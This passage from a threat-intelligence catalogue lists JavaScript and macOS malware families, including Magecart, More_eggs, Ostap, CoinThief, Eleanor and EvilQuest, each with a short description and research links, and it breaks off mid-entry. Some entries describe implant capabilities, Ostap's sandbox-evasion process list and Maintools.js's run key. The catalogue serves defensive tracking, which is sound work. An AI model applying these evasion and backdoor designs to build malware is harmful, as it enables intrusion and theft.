Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it’s a sophisticated implant built on top of relays, command-and-control servers and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in JavaScript included in a compromised checkout page. It copies data from "input fields" and sends it to a relay, which collects credit cards coming from a subset of compromised eCommerce sites and forwards them to command-and-control servers.

The tag is: misp-galaxy:malpedia="magecart"

magecart is also known as:

Table 2575. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart

https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html

https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/

https://community.riskiq.com/article/14924d61

https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter

https://geminiadvisory.io/magecart-google-tag-manager/

https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/

https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf

https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/

https://sansec.io/research/magecart-corona-lockdown

https://twitter.com/AffableKraut/status/1385030485676544001

https://sansec.io/research/magento-2-persistent-parasite

https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html

https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf

https://twitter.com/MBThreatIntel/status/1416101496022724609

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://twitter.com/AffableKraut/status/1415425132080816133?s=20

https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/

https://www.goggleheadedhacker.com/blog/post/14

https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/

https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/

https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/

https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/

https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/

https://www.riskiq.com/blog/labs/magecart-group-12-olympics/

https://community.riskiq.com/article/fda1f967

https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/

https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/

https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218

https://www.riskiq.com/blog/labs/magecart-nutribullet/

https://community.riskiq.com/article/743ea75b/description

https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/

https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/

https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/

https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season

https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/

https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/

https://community.riskiq.com/article/30f22a00

https://www.riskiq.com/blog/labs/magecart-medialand/

https://www.reflectiz.com/the-gocgle-web-skimming-campaign/

https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/

https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html

https://sansec.io/research/north-korea-magecart

https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/

https://community.riskiq.com/article/2efc2782

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://community.riskiq.com/article/5bea32aa

https://community.riskiq.com/article/017cf2e6

https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/

https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/

https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/

https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/

https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/

MiniJS

MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.

The tag is: misp-galaxy:malpedia="MiniJS"

MiniJS is also known as:

Table 2576. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.minijs

https://www.virustotal.com/gui/file/0ce9aadf6a3ffd85d6189590ece148b2f9d69e0ce1c2b8eb61361eb8d0f98571/details

More_eggs

More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:

  • d&exec = download and execute PE file

  • gtfo = delete files/startup entries and terminate

  • more_eggs = download additional/new scripts

  • more_onion = run new script and terminate current script

  • more_power = run command shell commands

The tag is: misp-galaxy:malpedia="More_eggs"

More_eggs is also known as:

  • SKID

  • SpicyOmelette

Table 2577. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://twitter.com/Arkbird_SOLG/status/1301536930069278727

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

https://attack.mitre.org/software/S0284/

https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware

https://github.com/eset/malware-ioc/tree/master/evilnum

https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw

https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/

https://blog.morphisec.com/cobalt-gang-2.0

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf

https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html

https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://asert.arbornetworks.com/double-the-infection-double-the-fun/

https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers

https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/

https://www.esentire.com/web-native-pages/unmasking-venom-spider

https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/

https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire

NanHaiShu

NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.

The tag is: misp-galaxy:malpedia="NanHaiShu"

NanHaiShu is also known as:

Table 2578. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu

https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

https://attack.mitre.org/software/S0228/

ostap

Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:

  • AgentSimulator.exe

  • anti-virus.EXE

  • BehaviorDumper

  • BennyDB.exe

  • ctfmon.exe

  • fakepos_bin

  • FrzState2k

  • gemu-ga.exe (possible misspelling of the Qemu hypervisor’s guest agent, qemu-ga.exe)

  • ImmunityDebugger.exe

  • KMS Server Service.exe

  • ProcessHacker

  • procexp

  • Proxifier.exe

  • python

  • tcpdump

  • VBoxService

  • VBoxTray.exe

  • VmRemoteGuest

  • vmtoolsd

  • VMware2B.exe

  • VzService.exe

  • winace

  • Wireshark

If a blacklisted process is found, the malware terminates.

Ostap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.

The tag is: misp-galaxy:malpedia="ostap"

ostap is also known as:

Table 2580. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/

https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py

https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/

https://www.intrinsec.com/deobfuscating-hunting-ostap/

https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/

Parrot TDS

This malicious code written in JavaScript is used as a Traffic Direction System (TDS). This TDS shows similarities to the Prometheus TDS. According to DECODED Avast.io, this TDS has been active since October 2021.

The tag is: misp-galaxy:malpedia="Parrot TDS"

Parrot TDS is also known as:

Table 2582. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.parrot_tds

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

PeaceNotWar

PeaceNotWar was integrated into the Node.js module node-ipc as a piece of malware/protestware with wiper characteristics. It targets machines with a public IP address located in Russia and Belarus (using geolocation) and overwrites files recursively using a heart emoji.

The tag is: misp-galaxy:malpedia="PeaceNotWar"

PeaceNotWar is also known as:

Table 2583. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar

https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers

https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/

https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c

PindOS

The tag is: misp-galaxy:malpedia="PindOS"

PindOS is also known as:

Table 2584. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.pindos

https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

QNodeService

According to Trend Micro, this is a Node.js based malware that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32- and 64-bit.

The tag is: misp-galaxy:malpedia="QNodeService"

QNodeService is also known as:

Table 2586. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice

https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf

https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/

QUICKCAFE

QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.

The tag is: misp-galaxy:malpedia="QUICKCAFE"

QUICKCAFE is also known as:

Table 2587. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

SQLRat

SQLRat campaigns typically involve a lure document that includes an image overlaid by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\Roaming\Microsoft\Templates\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.

The tag is: misp-galaxy:malpedia="SQLRat"

SQLRat is also known as:

Table 2589. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

Starfighter (Javascript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded PowerShell host so as not to be dependent on local PowerShell availability.

The tag is: misp-galaxy:malpedia="Starfighter (Javascript)"

Starfighter (Javascript) is also known as:

Table 2590. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter

https://github.com/Cn33liz/StarFighters

Swid

The tag is: misp-galaxy:malpedia="Swid"

Swid is also known as:

Table 2591. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.swid

https://imp0rtp3.wordpress.com/2021/08/12/tetris/

Maintools.js

Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.

The tag is: misp-galaxy:malpedia="Maintools.js"

Maintools.js is also known as:

Table 2593. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools

https://twitter.com/JohnLaTwC/status/915590893155098629

Unidentified JS 001 (APT32 Profiler)

The tag is: misp-galaxy:malpedia="Unidentified JS 001 (APT32 Profiler)"

Unidentified JS 001 (APT32 Profiler) is also known as:

Table 2594. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001

https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef

https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f

Unidentified JS 003 (Emotet Downloader)

According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.

The tag is: misp-galaxy:malpedia="Unidentified JS 003 (Emotet Downloader)"

Unidentified JS 003 (Emotet Downloader) is also known as:

Table 2595. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_003

https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/

Unidentified JS 004

A simple loader written in JavaScript found by Marco Ramilli.

The tag is: misp-galaxy:malpedia="Unidentified JS 004"

Unidentified JS 004 is also known as:

Table 2596. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_004

https://marcoramilli.com/2020/11/27/threat-actor-unkown/

Unidentified JS 005 (Stealer)

The tag is: misp-galaxy:malpedia="Unidentified JS 005 (Stealer)"

Unidentified JS 005 (Stealer) is also known as:

Table 2597. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_005

https://blogs.jpcert.or.jp/en/2021/07/water_pamola.html

Unidentified JS 006 (Winter Wyvern)

A script able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests.

The tag is: misp-galaxy:malpedia="Unidentified JS 006 (Winter Wyvern)"

Unidentified JS 006 (Winter Wyvern) is also known as:

Table 2598. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_006

https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/

Unidentified JS 002

The tag is: misp-galaxy:malpedia="Unidentified JS 002"

Unidentified JS 002 is also known as:

Table 2599. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002

Valak

According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).

Research shows that Valak is distributed through spam campaigns; however, in some cases, it infiltrates systems that are already infected with malicious programs such as Ursnif (also known as Gozi).

The tag is: misp-galaxy:malpedia="Valak"

Valak is also known as:

  • Valek

Table 2600. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.valak

https://unit42.paloaltonetworks.com/valak-evolution/

https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/

https://security-soup.net/analysis-of-valak-maldoc/

https://www.cybereason.com/blog/valak-more-than-meets-the-eye

https://twitter.com/malware_traffic/status/1207824548021886977

https://unit42.paloaltonetworks.com/atoms/monsterlibra/

https://blog.talosintelligence.com/2020/07/valak-emerges.html

https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/

https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7

witchcoven

The tag is: misp-galaxy:malpedia="witchcoven"

witchcoven is also known as:

Table 2601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven

https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

3CX Backdoor (OS X)

The tag is: misp-galaxy:malpedia="3CX Backdoor (OS X)"

3CX Backdoor (OS X) is also known as:

Table 2603. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.3cx_backdoor

https://objective-see.org/blog/blog_0x74.html

https://objective-see.org/blog/blog_0x73.html

AppleJeus (OS X)

According to PcRisk, AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.

The tag is: misp-galaxy:malpedia="AppleJeus (OS X)"

AppleJeus (OS X) is also known as:

Table 2605. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/

https://securelist.com/operation-applejeus-sequel/95596/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment

https://objective-see.com/blog/blog_0x5F.html

https://us-cert.cisa.gov/ncas/alerts/aa21-048a

https://www.youtube.com/watch?v=rjA0Vf75cYk

https://objective-see.com/blog/blog_0x49.html

https://vblocalhost.com/uploads/VB2021-Park.pdf

https://objective-see.com/blog/blog_0x54.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d

https://www.youtube.com/watch?v=1NkzTKkEM2k

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e

https://securelist.com/operation-applejeus/87553/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://securelist.com/apt-trends-report-q2-2020/97937/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c

Careto

The tag is: misp-galaxy:malpedia="Careto"

Careto is also known as:

  • Appetite

  • Mask

Table 2608. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto

https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed

CDDS

Google TAG has observed this malware being delivered via watering hole attacks using 0-day exploits, targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.

The tag is: misp-galaxy:malpedia="CDDS"

CDDS is also known as:

  • Macma

Table 2610. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds

https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/

https://objective-see.com/blog/blog_0x69.html

https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/

CoinThief

CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.

It was spreading in early 2014 from several different sources:

  • on GitHub (where the trojanized compiled binary didn’t match the displayed source code),

  • on popular and trusted download sites like CNET’s Download.com or MacUpdate.com, and

  • as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.

The patcher’s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt by adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker.

The browser extensions targeted Chrome and Firefox and were disguised as a “Pop-up blocker”. The extensions monitored visited websites, downloaded malicious JavaScript and injected it into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.

The backdoor enabled the attacker to take full control over the victim’s computer:

  • collect information about the infected computer

  • execute arbitrary shell scripts on the target computer

  • upload an arbitrary file from the victim’s hard drive to a remote server

  • update itself to a newer version

The tag is: misp-galaxy:malpedia="CoinThief"

CoinThief is also known as:

Table 2613. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief

https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed

https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/

Coldroot RAT

The tag is: misp-galaxy:malpedia="Coldroot RAT"

Coldroot RAT is also known as:

Table 2614. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat

https://objective-see.com/blog/blog_0x2A.html

https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf

Convuster

The tag is: misp-galaxy:malpedia="Convuster"

Convuster is also known as:

Table 2615. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.convuster

https://securelist.com/convuster-macos-adware-in-rust/101258/

CpuMeaner

The tag is: misp-galaxy:malpedia="CpuMeaner"

CpuMeaner is also known as:

Table 2616. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner

https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/

Dacls (OS X)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

The tag is: misp-galaxy:malpedia="Dacls (OS X)"

Dacls (OS X) is also known as:

Table 2620. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls

https://objective-see.com/blog/blog_0x5F.html

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

https://objective-see.com/blog/blog_0x57.html

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://www.sygnia.co/mata-framework

https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/

https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://securelist.com/apt-trends-report-q2-2020/97937/

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/

Dummy

The tag is: misp-galaxy:malpedia="Dummy"

Dummy is also known as:

Table 2624. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy

https://objective-see.com/blog/blog_0x32.html

Eleanor

Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses the Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.

The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via a Tor-generated address.

The Pastebin agent uploads the address in encrypted form to the Pastebin website, where the attackers can obtain it.

The web service is the main malicious component that provides the attackers with control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to perform the following actions:

  • Managing files

  • Listing processes

  • Connecting to various database management systems such as MySQL or SQLite

  • Connecting via bind/reverse shell

  • Executing shell commands

  • Capturing and browsing images and videos from the victim’s webcam

  • Sending emails with an attachment

The tag is: misp-galaxy:malpedia="Eleanor"

Eleanor is also known as:

Table 2625. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor

https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/

ElectroRAT

According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in Go that targets Windows, macOS and Linux users. The criminals behind ElectroRAT mainly target cryptocurrency users. The RAT is distributed via the trojanized Jamm, eTrader and DaoPoker applications.

The tag is: misp-galaxy:malpedia="ElectroRAT"

ElectroRAT is also known as:

Table 2626. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat

https://objective-see.com/blog/blog_0x61.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/

EvilOSX

The tag is: misp-galaxy:malpedia="EvilOSX"

EvilOSX is also known as:

Table 2627. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx

https://github.com/Marten4n6/EvilOSX

https://twitter.com/JohnLaTwC/status/966139336436498432

EvilQuest

According to PcRisk, EvilQuest (also known as ThiefQuest) behaves like many other malicious programs of this type: it encrypts files and creates a ransom message. Most ransomware renames encrypted files by appending an extension; this family leaves file names unchanged.

It drops "READ_ME_NOW.txt" in each folder that contains encrypted data and displays another ransom message in a pop-up window. The malware can also detect whether certain files are present on the computer, operates as a keylogger and receives commands from a command-and-control server.

The tag is: misp-galaxy:malpedia="EvilQuest"

EvilQuest is also known as:

  • ThiefQuest

Table 2628. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest

https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/

https://objective-see.com/blog/blog_0x5F.html

https://github.com/gdbinit/evilquest_deobfuscator

https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities

https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://twitter.com/dineshdina04/status/1277668001538433025

https://objective-see.com/blog/blog_0x59.html

https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/

https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/

FailyTale

The tag is: misp-galaxy:malpedia="FailyTale"

FailyTale is also known as:

Table 2629. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale

https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

FULLHOUSE

FULLHOUSE (also tracked as FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. It is written in C/C++ and combines a tunneler with backdoor commands such as shell command execution, file transfer, file management and process injection. C2 communication uses HTTP and must be configured through the command line or a configuration file.

The tag is: misp-galaxy:malpedia="FULLHOUSE"

FULLHOUSE is also known as:

Table 2633. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.fullhouse

https://www.mandiant.com/resources/blog/north-korea-supply-chain

GIMMICK (OS X)

GIMMICK is the macOS variant, written in Objective-C, of a multi-platform malware family; the name was given by Volexity. It is a file-based C2 implant used by Storm Cloud.

